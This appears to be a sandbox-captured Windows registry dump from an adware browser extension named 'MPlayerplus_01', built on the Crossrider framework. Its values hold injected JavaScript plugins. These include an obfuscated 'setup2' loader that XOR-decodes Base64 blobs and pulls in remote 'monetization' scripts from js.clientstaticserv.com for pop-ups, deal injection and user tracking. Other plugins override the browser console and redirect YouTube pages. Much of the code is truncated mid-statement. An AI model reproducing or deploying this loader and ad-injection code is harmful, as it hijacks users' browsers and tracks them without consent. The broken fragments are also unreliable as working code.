"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:)
[HKCU\Software\MPlayerplus_01\Plugins\46]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\207]
"Name" = "dbWrapper"
[HKCU\Software\MPlayerplus_01\Plugins\40]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"JavaScript" = "setup2=function(d,a){var b=function(i){var k=function(l){if(typeof l!==string||l.length===0){return;}return l.replace(/.|\n/g,function(m){return m.charCodeAt(0).toString(16);});};var j=function(l){return l.match(/.{1,2}/g);};var g=j(k(a));var h=g.length;var f=$jquery_171.map(j(i),function(l,m){return(parseInt(l,16)^parseInt(g[m%h],16));});return String.fromCharCode.apply(String,f);};var e=function(){var i=appAPI;var g=i.utils;var h=g.Base64;var f=h.decode;return b(f.call(h,d));};var c=function(){var f=appAPI.JSON.parse(e());try{appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[f.pluginId]=function(){appAPI.internal.monetization.addRemoteJS({httpUrl:(typeof f.httpUrl===string)?(f.httpUrl.replace(/__CROSSRIDER_SUB_ID__/g,appAPI.internal.monetization.getSubId()).replace(/__CROSSRIDER_APP_NAME__/g,encodeURIComponent(appAPI.appInfo.name)).replace(/__CROSSRIDER'"
[HKCU\Software\Crossrider]
"Verifier" = "60aa827dc6ab7283db367fb7eb2cda1a"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"Name" = "jQuery"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"
[HKCU\Software\MPlayerplus_01\Plugins\155]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"Name" = "IEAjax"
[HKCU\Software\MPlayerplus_01\Manifest]
"BgVersion" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO1'"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\MPlayerplus_01\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se4&"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100)};appAPI.openURL(a);}});appAPI.internal.callbacks.setEventHandler(runHelper,function(b){if(appAPI.isActiveTab()){var a=b;appA3&"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"URL" = "http://js.clientstaticserv.com/plugins/mins/hooks.js"
[HKCU\Software\MPlayerplus_01\Plugins\37]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBrowserEvents.js"
[HKCU\Software\MPlayerplus_01\Plugins\72]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\182]
"Name" = "openUrl"
[HKCU\Software\MPlayerplus_01\Plugins\7]
"Name" = "hooks"
[HKCU\Software\MPlayerplus_01]
"ActiveAppId" = "54246"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEPopup.js"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n
[HKCU\Software\MPlayerplus_01\Plugins\233]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/revizer_p_dynamic_b2b_2_m.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\MPlayerplus_01\Plugins\182]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]&"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"Name" = "IEInternal"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"Version" = "1"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/price_gong_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\MPlayerplus_01\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){A&"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTg2NjdkNTcxMjAyMWIwYTMwMWIwZjRlNGU1NTU4MWUxYjBlMTU1MzRjNDMwMzAyMGQ1ODFjMGYxNTBjMTEwYTFkMDYxMjU4MGMxNTA4NDYxNDFmNWIwNjFjMjkwMjFiMGMwNzRkMDYwNzA1NDUxMjAzMDkwYTFjMTEwZjExNDgxMjFlMTkwMDA4MDAwODFiNTIwMDA5MTMxZDMzMDE1NDAyMGUxNzUzMzkyMjI2M2U1ODM2M2MyZjI2M2EyOTI1M2QzMzIxMmMzMTMzMjcyMDM4MjkyNjNlM2EzNjQxNDA3ZTdjNTgxZTFiMGUxNTFhMzYxZTE4NTc0MDU2NGQxMjExMWQxMzFmNGU1YTU1MDExODBkNGIxYTE2MWMxMTA3MWMxZjFjMTI0YjBhMGMwMTViMDIwOTU5MWMxYzNhMDQwMjA1MWE1YjEwMDUxZjQ1MDEwNTEwMDMwMTA3MTkxMzUyMTIwZDFmMTkwMTFkMWUwZDUwMWEwOTAwMWIyYTA4NDkxNDE4MTU0OTM5MzEyMDI3NTEyYjJhMzkyNDIwMjkzNjNiMmEyODMxMjcyNTI1M2EzODNhMjAyNzMzMmI1NzU2N2M2NjU4MTUwNTE2MGIxZDFiMzMxMjRkNDA0NTUwNTA0MDdlNTU1YTU2NGY1ODEzMGMxMTE4MWQxNjFiMWE0ZDQwNDUzMjQxMWYxYzFhMGEwNjA2MTQwMjRiM2U2NjA5', 'cltuzvozei'); }"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\MPlayerplus_01\Manifest]
"ThanksUrl" = "NA"
[HKCU\Software\MPlayerplus_01\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\MPlayerplus_01\Plugins\42]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Update]
"LastCheck" = "1413862433"
[HKCU\Software\MPlayerplus_01\Plugins\78]
"Name" = "CrossriderInfo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\103]
"Name" = "intext_5_m"
[HKCU\Software\MPlayerplus_01\Plugins\155]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ibario_pops_m.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"RunInFrame" = "false"
[HKCU\Software\MPlayerplus_01\Plugins\190]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/pops_5_m.js"
[HKCU\Software\MPlayerplus_01\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,103,104,155,184,190,191,220,195,211,221,233,242,244,253,177,91,28"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\MPlayerplus_01\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nM'"
[HKCU\Software\MPlayerplus_01\Plugins\177]
"URL" = "http://js.clientstaticserv.com/plugins/mins/crossriderDashboard.js"
[HKCU\Software\MPlayerplus_01\Installer]
"zdata" = "0"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDM2MDRhNGI0YzUwNGIwYTAxMWEwODNmMTgwNzRlNGE0OTQwMWQxYTBjMWE1MDQ0NDMxOTQ3MDEwNzBhMGEwMDE5NDUwNTFlMGYwZDVhMGQwYTBlMTg0NDA2MTExZjAzMDYwZDBhMDMxYTFmNDIxYTFhNWQxNjA2MTkwNDA0MGUwMDRkMGExMDExMWMyNzM1MzUyODNlM2YzYTMxMjcyNzNjMmYzODM0M2YyNTJiM2QzYzJhMjczNTRjMGExYzAwM2QwYjAxMDIxZDU3MzUzNDJmMjIyNjMxMjYzYzMxMmUyZjM5MzMzMTM5MzIyYTIwMzkyNzJmMzQzMzU2MDEwYjExNTMyNzM1MjkzOTIzMjMzYTMwM2MyYTNkMzgzNTNlM2YzNTNiM2QzYzJhMjczNTQ4NDc2NjUwNDk0MjU1NGMxMDFlMWUxYjFmMjUxYjBlNTc1NDU4NDgwMjFmMTgwMDFhNTg1YTQxMTEzNTA5MTkwODAyMDMxMTJhMDcxNjBjMDU0NTE4MWMxYTAxMTEwMDU2MDkwNTA2NDMxMzFiMDYwNzQxMTIwYjFjMGExZjEzMWIwYjA1MWE1NjAwMTk1NDBmMTgwODBjMWIwYjE0NTcwOTE5MDgwMjM2M2QyYTJkMmEyNTM5MzgzZTM5MmQyNzI3MzEyYjNmMjgzNDI1MzQzNjNkNTMwZjA4MWEzZTAyMTgxYzBjNWYyYTMxM2IzODI1MzgzZjIyMjAyNjMwM2MyNzJiM2EzYjMzM2UyODJmMzAzMTI3NGMwMjAyMDg0ZDM2M2QzNjNjMzczOTM5MzkyNTM0MmMzMDJhM2IyYjJmMzgzNDI1MzQzNjNkNTc0MjcyNGE0YTRiNGM1MjE5MGUwMDA5MTEwNDIzMGY0ZTRhNDk1MzQ1NWM1NDYwNGE0YjRjNTA0YjE0MTAxYzBjMDMwOTBhMDA1MjUzNDIyZTRjMGIwMjA1MWIxYzE5MDc'"
[HKCU\Software\MPlayerplus_01\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { //alert(appAPI.isMatchPages(*youtube*)); //alert(appAPI.isMatchPages(*watch*)); //alert(appAPI.isMatchPages(*hd=1*)) if (appAPI.isMatchPages(*youtube*) && appAPI.isMatchPages(*watch*) && !appAPI.isMatchPages(*hd=1*)) { //alert(window.location); window.location = window.location &hd=1"
[HKCU\Software\MPlayerplus_01\Plugins\155]
"Name" = "ibario_pops_m"
[HKCU\Software\MPlayerplus_01\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3OTYzNDQwMDBkMDQwNDM3MDYwNjUxNTA0NjRhMjYyZjM3MzAyYjM5MjcyYjMyMjEzYTJmM2MyZDI3M2UyYzM1NDkxYjE4MWUxZDE2MGQ0NTExMDMzOTE4MTAwODExMGU1YTAwMDA0ODRhNjI3MDUyMDQwZTAxMGQxYTA0MmYwYzViNGE1NDUwNDE1OTVmNjA2ZjRhMTAxZTE4MGIxYTBmMzkzOTQ0NTI1OTUyMDMwYjFhMGUxYzFkNDgzNzI2MTIxZDNkMDQwMzBiMGYwYTM3MGMwMjE4M2QyYjRhNGU0YTQxMzcyNjMzMjYzZDI3M2UzMjNlMzUzNzMxM2YyNzM2MmIzNTVjMDgwZjQ2MWUxOTEyNWQxNzBiMWUxYTA3MDExZTFlNDkzZDJiMjkyMTI1MzUzYjJiMzkzMDI3MjYzNTMwMmIyYjM4MjYzOTMwM2QyYjRjMTExODA5MWYwYTE1MDY1ZjJiMzUzMDM4MjkzYjJhMjIzZDI2MzEzODJjMjgzNDI3MmUyMzMxMzAyYjM1NTUwODBmMGI0NDJmMmIyMTI2MjUyMDM5MzQyMTNkMzUyNjNkMjEzOTM2MzgzOTIxM2QyZjJiNDQwNjA0MTc1NzQxNDg1MjUwNWMwYzExMWQ1MzJlMDcxYzFjNTg1ZDRiNWEwZDE2MWUzMjAxMTQxNTVjNGI0ZjQ4NzkxNw==', 'jsjfhyptbt'); }"
[HKCU\Software\MPlayerplus_01\Plugins\47]
"Name" = "resources_background"
[HKCU\Software\MPlayerplus_01\Plugins\39]
"JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""
[HKCU\Software\MPlayerplus_01\Plugins\47]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\207]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbac'"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\MPlayerplus_01\Installer]
"FullVersion" = "1.34.5.12"
[HKCU\Software\MPlayerplus_01\Plugins\246]
"Name" = "setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\MPlayerplus_01\Plugins\191]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg2Mzc5NDEwZDA0MTAwMzJmMTAxZjRiNGE0MzQ3MTgxMDA3MGE1ODVjNDYwMzE3MDQwNDBkMTA1NDAxMWExYzA2MGM0YjEzMGIxZTU1MGYxNjBkMTkwMjRhMDMwMDE4NTUxMjAxMDAxMzA2MTYwMDA1MDEwODBkMDQ0NDQxNGQ1MTVlMDkxYTE0NGMxOTFhNTI0ZjZmNzk0NjFiMGUxNjAzMWEyNTExMDk1MjVlNTM1ODBhMDcxZDAwMTA1ZjVmNGIwMDFmMDEwNjFiMTU0ZDA2MTkxMTA1MTU0YzEwMDYxZDRjMDgxNTAwMWExYjRkMDAwZDFiNGMxNTAyMGQxMDFmMTEwMzA4MDIxMTBhMDc0OTQyNTQ1NjVkMDQxOTBkNGIxYTE3NTE1NjY4N2E0YjAwMGYxMDE3MGQxZDMzMDY1MTUzNTA1MjVjNDE0ODc5NWE0MjUzNDk1MjE1MDAwMjEwMWExOTAzMWY0YjRhNDMzZTUyMTcxYjE1MTIwMzAwMWUwNDQ3MmQ0ODc5NWE0MjUzNDk1MjBhMGIxYzBkMWQxZjI4MjA0YjRhNDM0NzE5MDI1MzUyMTYwYTE5MTUwYzAzNTAxMzFhMTQwNjFjMWU1ZTNjMDYxOTExMDUxNTEyMDEwYzE2MTA0NTRkNTk0ZTVhNDUwNjA3MTQwNjAzMTkwYTE2MWU0NTVhNDkwNzBhMGIxNDBiMDQ1NDNkMTAwMDA1MTUwYTAwMTYxNjFjMTE1MzU0NTAxODE4NGI0NDUzMGQwYjFkMGQxZjE0NGIyZjA3MWEwZjE0MWMxOTAyMDYwMzAzNGEwMzA4MGIxMDBjMDMxMzA0MDIxNjFjMGQ0MjRlNDkwYjQ0MDYxMTA5MDMxYjBiMTQwNzU3NTk0NTU3MDcwMTE1MTEwMDFiMTkwNzAwMDIzYjJjMzkzMDNjM2EyMzMxMmMzNDIxMjEyNTMxMjYyYjJmMmEyMTJmM2I'"
[HKCU\Software\MPlayerplus_01\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/dealply_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\1]
"Name" = "base"
[HKCU\Software\MPlayerplus_01\Plugins\183]
"Name" = "tabsWrapper"
[HKCU\Software\MPlayerplus_01\Plugins\195]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_convertmedia_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"Version" = "9"
[HKCU\Software\MPlayerplus_01\Plugins\21]
"JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,E'"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,toke'"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"Version" = "46"
[HKCU\Software\MPlayerplus_01\Plugins\14]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderUtils.js"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"Name" = "ie8_fix_1"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\MPlayerplus_01\Plugins\36]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBackground.js"
[HKCU\Software\MPlayerplus_01\Plugins\183]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\40]
